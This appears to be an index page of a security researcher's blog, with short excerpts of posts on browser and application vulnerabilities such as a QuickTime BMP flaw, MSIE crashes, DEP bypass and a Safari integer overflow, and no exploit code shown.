Ultra-Edit buffer overflow in GNU Aspell

While looking at logs from my fuzzers, I found a bug in UltraEdit that triggered when I loaded a file with a long string of alphabetic characters…

Apple QuickTime memory corruption when loading BMP file

From http://support.apple.com/kb/HT4104:
CVE-ID: CVE-2010-0536

Impact: Opening a maliciously crafted BMP image may lead to an unexpected application termination or arbitrary code execution

Description: A memory corruption issue exists in the handling of BMP images…

MSIE 9 regular expression related crashes

The following code snippets will crash MSIE 9 platform review…

Internet Exploiter 2 – bypassing DEP

In 2005 I released Internet Exploiter 2, which helped make heap spraying popular in browser exploits…

ALPHA3 released

I realized that if I would wait until I had fully documented everything in ALPHA3, it would probably never get released…

MS09-014: EMBED element memory corruption

Microsoft has just released a fix for an issue I reported to them on December 4th, 2008. A simple repro can be found here

MSIE screen[""] NULL ptr DoS details

MSIE can be made to crash with a NULL ptr Read AV by executing a very small piece of JavaScript. This affects MSIE 6.0, 7.0 and 8.0 beta2…

Safari arguments integer overflow PoC (CVE-2008-2303)

CVE-2008-2303 covers an integer overflow in the handling of indices in the “arguments” array in Apple Safari that affects iPhone, iPod and PC (Mac and Windows). It was fixed in Safari 3.2 for iPhone and iPod in July and for PC in November…